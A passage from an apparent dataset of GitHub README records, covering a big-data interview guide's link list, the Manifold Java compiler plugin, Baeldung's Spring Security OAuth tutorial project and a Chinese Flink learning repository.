-[小米大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据提前批一面二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E4%B8%80%E9%9D%A2%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据日常实习一二三面(已oc)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E5%AE%9E%E4%B9%A0%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%EF%BC%88%E5%B7%B2oc%EF%BC%89.pdf) -[小米大数据日常面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据研发(已OC)timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%EF%BC%88%E5%B7%B2OC%EF%BC%89timeline.pdf) -[小米大数据面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F.pdf) -[小米面经,二面等通知中](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E9%9D%A2%E7%BB%8F%EF%BC%8C%E4%BA%8C%E9%9D%A2%E7%AD%89%E9%80%9A%E7%9F%A5%E4%B8%AD%E3%80%82.pdf) - - - - - - - -大数据&后端书籍 ---- -PDF书籍(含Hadoop、Spark、Flink等大数据书籍)在公众号回复关键字“大数据书籍”或“Java书籍”自行进百度云盘群保存即可 - -## 交流群 -交流群建好了,进群的小伙伴可以加我微信:**MoRan1607,备注:GitHub** -

- -

-

-

- -",0 -manifold-systems/manifold,"Manifold is a Java compiler plugin, its features include Metaprogramming, Properties, Extension Methods, Operator Overloading, Templates, a Preprocessor, and more.",2017-06-07T02:37:23Z,,"
- - - -![latest](https://img.shields.io/badge/latest-v2024.1.14-royalblue.svg) -[![slack](https://img.shields.io/badge/slack-manifold-seagreen.svg?logo=slack)](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) -[![GitHub Repo stars](https://img.shields.io/github/stars/manifold-systems/manifold?logo=github&style=flat&color=tan)](https://github.com/manifold-systems/manifold) - ---- - -## What is Manifold? -Manifold is a Java compiler plugin. Use it to supplement your Java projects with highly productive features. - -Advanced compile-time metaprogramming type-safely integrates any kind of data, metadata, or DSL directly into Java. -* [SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) _**(New!)**_ -* [GraphQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) -* [JSON & JSON Schema](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), - [YAML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), - [XML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml) -* [CSV](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv) -* [JavaScript](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js) -* etc. - - -Powerful **language enhancements** significantly improve developer productivity. -* [Extension methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) -* [_True_ delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) -* [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) -* [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) -* [Operator overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) -* [Unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) -* [A *Java* template engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) -* [A preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) -* ...and more - -Each feature is available as a separate dependency. Simply add the Manifold dependencies of your choosing to your existing project and begin taking advantage of them. - -All fully supported in JDK LTS releases 8 - 21 + latest with comprehensive IDE support in **IntelliJ IDEA** and **Android Studio**. - -># _**What's New...**_ -> ->[](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) -> ->### [Type-safe SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) -> Manifold SQL lets you write native SQL _directly_ and _type-safely_ in your Java code. ->- Query types are instantly available as you type native SQL of any complexity in your Java code ->- Schema types are automatically derived from your database, providing type-safe CRUD, decoupled TX, and more ->- No ORM, No DSL, No wiring, and No code generation build steps ->

-> [![img_3.png](./docs/images/img_3.png)](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) - -## Who is using Manifold? - -Sampling of companies using Manifold: - - - -## What can you do with Manifold? - -### [Meta-programming](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold) -Use the framework to gain direct, type-safe access to *any* type of resource, such as -[**SQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql), -[**JSON**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), -[**GraphQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql), -[**XML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml), -[**YAML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), -[**CSV**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv), and even -other languages such as [**JavaScript**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js). -Remove the code gen step in your build process. [ **▶** Check it out!](http://manifold.systems/images/graphql.mp4) - -[**SQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql) -Use _native_ SQL of any complexity _directly_ and _type-safely_ from Java. -```java -Language english = - ""[.sql/]select * from Language where name = 'English'"".fetchOne(); -Film film = Film.builder(""My Movie"", english) - .withDescription(""Nice movie"") - .withReleaseYear(2023) - .build(); -MyDatabase.commit(); -``` - -[**GraphQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) -Use types defined in .graphql files *directly*, no code gen steps! Make GraphQL changes and immediately use them with code completion. -```java -var query = MovieQuery.builder(Action).build(); -var result = query.request(""http://com.example/graphql"").post(); -var actionMovies = result.getMovies(); -for (var movie : actionMovies) { - out.println( - ""Title: "" + movie.getTitle() + ""\n"" + - ""Genre: "" + movie.getGenre() + ""\n"" + - ""Year: "" + movie.getReleaseDate().getYear() + ""\n""); -} -``` - -[**JSON:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json) -Use .json schema files directly and type-safely, no code gen steps! Find usages of .json properties in your Java code. -```java -// From User.json -User user = User.builder(""myid"", ""mypassword"", ""Scott"") - .withGender(male) - .withDob(LocalDate.of(1987, 6, 15)) - .build(); -User.request(""http://api.example.com/users"").postOne(user); -``` - -### [Extension Methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) -Add your own methods to existing Java classes, even *String*, *List*, and *File*. Eliminate boilerplate code. -[ **▶** Check it out!](http://manifold.systems/images/ExtensionMethod.mp4) -```java -String greeting = ""hello""; -greeting.myMethod(); // Add your own methods to String! -``` - -### [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) -Favor composition over inheritance. Use `@link` and `@part` for automatic interface implementation forwarding and _true_ delegation. -> ```java -> class MyClass implements MyInterface { -> @link MyInterface myInterface; // transfers calls on MyInterface to myInterface -> -> public MyClass(MyInterface myInterface) { -> this.myInterface = myInterface; // dynamically configure behavior -> } -> -> // No need to implement MyInterface here, but you can override myInterface as needed -> } -> ``` - -### [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) -Eliminate boilerplate getter/setter code, improve your overall dev experience with properties. -```java -public interface Book { - @var String title; // no more boilerplate code! -} -// refer to it directly by name -book.title = ""Daisy""; // calls setter -String name = book.title; // calls getter -book.title += "" chain""; // calls getter & setter -``` -Additionally, the feature automatically _**infers**_ properties, both from your existing source files and from -compiled classes your project uses. Reduce property use from this: -```java -Actor person = result.getMovie().getLeadingRole().getActor(); -Likes likes = person.getLikes(); -likes.setCount(likes.getCount() + 1); -``` -to this: -```java -result.movie.leadingRole.actor.likes.count++; -``` - -### [Operator Overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) -Implement *operator* methods on any type to directly support arithmetic, relational, index, and unit operators. -```java -// BigDecimal expressions -if (bigDec1 > bigDec2) { - BigDecimal result = bigDec1 + bigDec2; - ... -} -// Implement operators for any type -MyType value = myType1 + myType2; -``` - -### [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) -Tuple expressions provide concise syntax to group named data items in a lightweight structure. -```java -var t = (name: ""Bob"", age: ""35""); -System.out.println(""Name: "" + t.name + "" Age: "" + t.age); - -var t = (person.name, person.age); -System.out.println(""Name: "" + t.name + "" Age: "" + t.age); -``` -You can also use tuples with new [`auto` type inference](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-inference-with-auto) to enable multiple return values from a method. -### [Unit Expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) -Unit or *binding* operations are unique to the Manifold framework. They provide a powerfully concise syntax and can be -applied to a wide range of applications. -```java -import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc -... -Length distance = 100 mph * 3 hr; -Force f = 5.2 kg m/s/s; // same as 5.2 N -Mass infant = 9 lb + 8.71 oz; -``` - -### [Ranges](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections#ranges) -Easily work with the *Range* API using [unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions). -Simply import the *RangeFun* constants to create ranges. -```java -// imports the `to`, `step`, and other ""binding"" constants -import static manifold.collections.api.range.RangeFun.*; -... -for (int i: 1 to 5) { - out.println(i); -} - -for (Mass m: 0kg to 10kg step 22r unit g) { - out.println(m); -} -``` - -### [Science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) -Use the [manifold-science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) -framework to type-safely incorporate units and precise measurements into your applications. -```java -import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc. -... -Velocity rate = 65mph; -Time time = 1min + 3.7sec; -Length distance = rate * time; -``` - -### [Preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) -Use familiar directives such as **#define** and **#if** to conditionally compile your Java projects. The preprocessor offers -a simple and convenient way to support multiple build targets with a single codebase. [ **▶** Check it out!](http://manifold.systems/images/preprocessor.mp4) -```java -#if JAVA_8_OR_LATER - @Override - public void setTime(LocalDateTime time) {...} -#else - @Override - public void setTime(Calendar time) {...} -#endif -``` - -### [Structural Typing](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#structural-interfaces-via-structural) -Unify disparate APIs. Bridge software components you do not control. Access maps through type-safe interfaces. [ **▶** Check it out!](http://manifold.systems/images/structural%20typing.mp4) -```java -Map map = new HashMap<>(); -MyThingInterface thing = (MyThingInterface) map; // O_o -thing.setFoo(new Foo()); -Foo foo = thing.getFoo(); -out.println(thing.getClass()); // prints ""java.util.HashMap"" -``` - -### [Type-safe Reflection](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-safe-reflection-via-jailbreak) -Access private features with @Jailbreak to avoid the drudgery and vulnerability of Java reflection. [ **▶** Check it out!](http://manifold.systems/images/jailbreak.mp4) -```java -@Jailbreak Foo foo = new Foo(); -// Direct, *type-safe* access to *all* foo's members -foo.privateMethod(x, y, z); -foo.privateField = value; -``` - -### [Checked Exception Handling](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions) -You now have an option to make checked exceptions behave like unchecked exceptions! No more unintended exception -swallowing. No more *try*/*catch*/*wrap*/*rethrow* boilerplate! -```java -List strings = ...; -List urls = strings.stream() - .map(URL::new) // No need to handle the MalformedURLException! - .collect(Collectors.toList()); -``` - -### [String Templates](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings) -Inline variables and expressions in String literals, no more clunky string concat! [ **▶** Check it out!](http://manifold.systems/images/string_interpolation.mp4) -```java -int hour = 15; -// Simple variable access with '$' -String result = ""The hour is $hour""; // Yes!!! -// Use expressions with '${}' -result = ""It is ${hour > 12 ? hour-12 : hour} o'clock""; -``` - -### [A *Java* Template Engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) -Author template files with the full expressive power of Java, use your templates directly in your code as types. -Supports type-safe inclusion of other templates, shared layouts, and more. [ **▶** Check it out!](http://manifold.systems/images/mantl.mp4) -```java -List users = ...; -String content = abc.example.UserSample.render(users); -``` -A template file *abc/example/UserSample.html.mtl* -```html -<%@ import java.util.List %> -<%@ import com.example.User %> -<%@ params(List users) %> - - -<% for(User user: users) { %> - <% if(user.getDateOfBirth() != null) { %> - User: ${user.getName()}
- DOB: ${user.getDateOfBirth()}
- <% } %> -<% } %> - - -``` - -## [IDE Support](https://github.com/manifold-systems/manifold) -Use the [Manifold plugin](https://plugins.jetbrains.com/plugin/10057-manifold) to fully leverage -Manifold with **IntelliJ IDEA** and **Android Studio**. The plugin provides comprehensive support for Manifold including code -completion, navigation, usage searching, refactoring, incremental compilation, hotswap debugging, full-featured -template editing, integrated preprocessor, and more. - -

- -[Get the plugin from JetBrains Marketplace](https://plugins.jetbrains.com/plugin/10057-manifold) - -## [Projects](https://github.com/manifold-systems/manifold) -The Manifold project consists of the core Manifold framework and a collection of sub-projects implementing SPIs provided -by the core framework. Each project consists of one or more **dependencies** you can easily add to your project: - -[Manifold : _Core_](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)
- -[Manifold : _Extensions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
- -[Manifold : _Delegation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
- -[Manifold : _Properties_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
- -[Manifold : _Tuples_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
- -[Manifold : _SQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)
-[Manifold : _GraphQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
-[Manifold : _JSON_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)
-[Manifold : _XML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)
-[Manifold : _YAML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml)
-[Manifold : _CSV_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)
-[Manifold : _Property Files_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-properties)
-[Manifold : _Image_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-image)
-[Manifold : _Dark Java_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-darkj)
-[Manifold : _JavaScript_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)
- -[Manifold : _Java Templates_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
- -[Manifold : _String Interpolation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)
-[Manifold : _(Un)checked Exceptions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)
- -[Manifold : _Preprocessor_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
- -[Manifold : _Science_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
- -[Manifold : _Collections_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections)
-[Manifold : _I/0_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-io)
-[Manifold : _Text_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-text)
- ->Experiment with sample projects:
->* [Manifold : _Sample App_](https://github.com/manifold-systems/manifold-sample-project)
->* [Manifold : _Sample SQL App_](https://github.com/manifold-systems/manifold-sql-sample-project)
->* [Manifold : _Sample GraphQL App_](https://github.com/manifold-systems/manifold-sample-graphql-app)
->* [Manifold : _Sample REST API App_](https://github.com/manifold-systems/manifold-sample-rest-api)
->* [Manifold : _Sample Web App_](https://github.com/manifold-systems/manifold-sample-web-app) ->* [Manifold : _Gradle Example Project_](https://github.com/manifold-systems/manifold-simple-gradle-project) ->* [Manifold : _Sample Kotlin App_](https://github.com/manifold-systems/manifold-sample-kotlin-app) - -## Platforms - -Manifold supports: -* Java SE (8 - 21) -* [Android](http://manifold.systems/android.html) -* [Kotlin](http://manifold.systems/kotlin.html) (limited) - -Comprehensive IDE support is also available for IntelliJ IDEA and Android Studio. - -## [Chat](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) -Join our [Slack Group](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) to start -a discussion, ask questions, provide feedback, etc. Someone is usually there to help. - -
-",0 -Baeldung/spring-security-oauth,"Just Announced - Learn Spring Security OAuth"": """,2016-03-02T09:04:07Z,,"## Spring Security OAuth - -I've just announced a new course, dedicated on exploring the new OAuth2 stack in Spring Security 5 - Learn Spring Security OAuth: -http://bit.ly/github-lsso - -


- - - -## Build the Project -``` -mvn clean install -``` - - - -## Projects/Modules -This project contains a number of modules, here is a quick description of what each module contains: -- `oauth-rest` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack -- `oauth-jwt` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack, focused on JWT support -- `oauth-jws-jwk-legacy` - Authorization Server and Resource Server for JWS + JWK in a Spring Security OAuth2 Application -- `oauth-legacy` - Authorization Server, Resource Server, Angular and AngularJS Apps for legacy Spring Security OAuth2 - - - -## Run the Modules -You can run any sub-module using command line: -``` -mvn spring-boot:run -``` - -If you're using Spring STS, you can also import them and run them directly, via the Boot Dashboard - -You can then access the UI application - for example the module using the Password Grant - like this: -`http://localhost:8084/` - -You can login using these credentials, username:john and password:123 - -## Run the Angular 7 Modules - -- To run any of Angular7 front-end modules (_spring-security-oauth-ui-implicit-angular_ , _spring-security-oauth-ui-password-angular_ and _oauth-ui-authorization-code-angular_) , we need to build the app first: -``` -mvn clean install -``` - -- Then we need to navigate to our Angular app directory: -``` -cd src/main/resources -``` - -And run the command to download the dependencies: -``` -npm install -``` - -- Finally, we will start our app: -``` -npm start -``` -- Note: Angular7 modules are commented out because these don't build on Jenkins as they need npm installed, but they build properly locally -- Note for Angular version < 4.3.0: You should comment out the HttpClient and HttpClientModule import in app.module and app.service.ts. These version rely on the HttpModule. - -## Using the JS-only SPA OAuth Client -The main purpose of these projects are to analyze how OAuth should be carried out on Javascript-only Single-Page-Applications, using the authorization_code flow with PKCE. - -The *clients-SPA-legacy/clients-js-only-react-legacy* project includes a very simple Spring Boot Application serving a couple of separate Single-Page-Applications developed in React. - -It includes two pages: - * a 'Step-By-Step' guide, where we analyze explicitly each step that we need to carry out to obtain an access token and request a secured resource - * a 'Real Case' scenario, where we can log in, and obtain or use secured endpoints (provided by the Auth server and by a Custom server we set up) - * the Article's Example Page, with the exact same code that is shown in the related article - -The Step-By-Step guide supports using different providers (Authorization Servers) by just adding (or uncommenting) the corresponding entries in the static/*spa*/js/configs.js. - -### The 'Step-by-Step' OAuth Client with PKCE page -After running the Spring Boot Application (a simple *mvn spring-boot:run* command will be enough), we can browse to *http://localhost:8080/pkce-stepbystep/index.html* and follow the steps to find out what it takes to obtain an access token using the Authorization Code with PKCE Flow. - -When prompted the login form, we might need to create a user for our Application first. - -### The 'Real-Case' OAuth Client with PKCE page -To use all the features contained in the *http://localhost:8080/pkce-realcase/index.html* page, we'll need to first start the resource server (clients-SPA-legacy/oauth-resource-server-auth0-legacy). - -In this page, we can: - * List the resources in our resource server (public, no permissions needed) - * Add resources (we're requested the permissions to do that when logging in. For simplicity sake, we just request the existing 'profile' scope) - * Remove resources (we actually can't accomplish this task, because the resource server requires the application to have permissions that were not included in the existing scopes) - -",0 -zhisheng17/flink-learning,flink learning blog. http://www.54tianzhisheng.cn/ 含 Flink 入门、概念、原理、实战、性能调优、源码解析等内容。涉及 Flink Connector、Metrics、Library、DataStream API、Table API & SQL 等内容的学习案例,还有 Flink 落地应用的大型项目案例(PVUV、日志存储、百亿数据实时去重、监控告警)分享。欢迎大家支持我的专栏《大数据实时计算引擎 Flink 实战与性能优化》,2019-01-01T07:38:28Z,,"# Flink 学习 - -麻烦路过的各位亲给这个项目点个 star,太不易了,写了这么多,算是对我坚持下来的一种鼓励吧!另外特别感谢 [JetBrains](https://jb.gg/OpenSourceSupport) 公司提供的免费全家桶工具,🙏🙏🙏! - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-05-25-124027.jpg) - -## Stargazers over time - -![Stargazers over time](https://starchart.cc/zhisheng17/flink-learning.svg) - -## 本项目结构 - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/2020-01-11-064410.png) - - -## How to build - -Maybe your Maven conf file `settings.xml` mirrors can add aliyun central mirror : - -```xml - - alimaven - central - aliyun maven - https://maven.aliyun.com/repository/central - -``` - -then you can run the following command : - -``` -mvn clean package -Dmaven.test.skip=true -``` - -you can see following result if build success. - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-27-121923.jpg) - -## Flink 系统专栏 - -基于 Flink 1.9 讲解的专栏,涉及入门、概念、原理、实战、性能调优、系统案例的讲解。扫码下面专栏二维码可以订阅该专栏 - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-11-05-044731.jpg) - -首发地址:[http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/](http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/) - -专栏地址:[https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f](https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f) - - - -## Change - -**2022/02/26** 将自己 《Flink 实战与性能优化》专栏放在 GitHub,参见 books 目录 - -**2021/12/18** 将该项目的 Flink 版本升级至 1.14.2,如果有需要可以去老的分支查看。 - -**2021/08/15** 将该项目的 Flink 版本升级至 1.13.2,API 发生重大改变,所以代码结构也做了相应的调整(部分代码在 master 分支已经删除,同时将之前的代码切到 [feature/flink-1.10.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.10.0) 上了,如果有需要可以去老的分支查看)。 - -**2020/02/16** 将该项目的 Flink 版本升级至 1.10,该版本代码都是经过测试成功运行的,尽量以该版本作为参考,如果代码在你们集群测试不成功,麻烦检查 Flink 版本是否一致,或者是否有包冲突问题。 - -**2019/09/06** 将该项目的 Flink 版本升级到 1.9.0,有一些变动,Flink 1.8.0 版本的代码经群里讨论保存在分支 [feature/flink-1.8.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.8.0) 以便部分同学需要。 - -**2019/06/08** 四本 Flink 书籍: - -+ [Introduction_to_Apache_Flink_book.pdf]() 这本书比较薄,处于介绍阶段,国内有这本的翻译书籍 - -+ [Learning Apache Flink.pdf]() 这本书比较基础,初学的话可以多看看 - -+ [Stream Processing with Apache Flink.pdf]() 这本书是 Flink PMC 写的 - -+ [Streaming System.pdf]() 这本书评价不是一般的高 - -**2019/06/09** 新增流处理引擎相关的 Paper,在 paper 目录下: - -+ [流处理引擎相关的 Paper](./paper/paper.md) - -**【提示】**:关于书籍的下载,因版权问题,不方便提供,所以已经删除,需要的话可以切换到老分支去下载。 - -## 博客 - -1、[Flink 从0到1学习 —— Apache Flink 介绍](http://www.54tianzhisheng.cn/2018/10/13/flink-introduction/) - -2、[Flink 从0到1学习 —— Mac 上搭建 Flink 1.6.0 环境并构建运行简单程序入门](http://www.54tianzhisheng.cn/2018/09/18/flink-install) - -3、[Flink 从0到1学习 —— Flink 配置文件详解](http://www.54tianzhisheng.cn/2018/10/27/flink-config/) - -4、[Flink 从0到1学习 —— Data Source 介绍](http://www.54tianzhisheng.cn/2018/10/28/flink-sources/) - -5、[Flink 从0到1学习 —— 如何自定义 Data Source ?](http://www.54tianzhisheng.cn/2018/10/30/flink-create-source/) - -6、[Flink 从0到1学习 —— Data Sink 介绍](http://www.54tianzhisheng.cn/2018/10/29/flink-sink/) - -7、[Flink 从0到1学习 —— 如何自定义 Data Sink ?](http://www.54tianzhisheng.cn/2018/10/31/flink-create-sink/) - -8、[Flink 从0到1学习 —— Flink Data transformation(转换)](http://www.54tianzhisheng.cn/2018/11/04/Flink-Data-transformation/) - -9、[Flink 从0到1学习 —— 介绍 Flink 中的 Stream Windows](http://www.54tianzhisheng.cn/2018/12/08/Flink-Stream-Windows/) - -10、[Flink 从0到1学习 —— Flink 中的几种 Time 详解](http://www.54tianzhisheng.cn/2018/12/11/Flink-time/) - -11、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 ElasticSearch](http://www.54tianzhisheng.cn/2018/12/30/Flink-ElasticSearch-Sink/) - -12、[Flink 从0到1学习 —— Flink 项目如何运行?](http://www.54tianzhisheng.cn/2019/01/05/Flink-run/) - -13、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Kafka](http://www.54tianzhisheng.cn/2019/01/06/Flink-Kafka-sink/) - -14、[Flink 从0到1学习 —— Flink JobManager 高可用性配置](http://www.54tianzhisheng.cn/2019/01/13/Flink-JobManager-High-availability/) - -15、[Flink 从0到1学习 —— Flink parallelism 和 Slot 介绍](http://www.54tianzhisheng.cn/2019/01/14/Flink-parallelism-slot/) - -16、[Flink 从0到1学习 —— Flink 读取 Kafka 数据批量写入到 MySQL](http://www.54tianzhisheng.cn/2019/01/15/Flink-MySQL-sink/) - -17、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RabbitMQ](https://t.zsxq.com/uVbi2nq) - -18、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HBase](https://t.zsxq.com/zV7MnuJ) - -19、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HDFS](https://t.zsxq.com/zV7MnuJ) - -20、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Redis](https://t.zsxq.com/zV7MnuJ) - -21、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Cassandra](https://t.zsxq.com/uVbi2nq) - -22、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Flume](https://t.zsxq.com/zV7MnuJ) - -23、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 InfluxDB](https://t.zsxq.com/zV7MnuJ) - -24、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RocketMQ](https://t.zsxq.com/zV7MnuJ) - -25、[Flink 从0到1学习 —— 你上传的 jar 包藏到哪里去了](https://t.zsxq.com/uniY7mm) - -26、[Flink 从0到1学习 —— 你的 Flink job 日志跑到哪里去了](https://t.zsxq.com/zV7MnuJ) - - -### Flink 源码项目结构 - -![](./pics/Flink-code.png) - - -## 学习资料 - 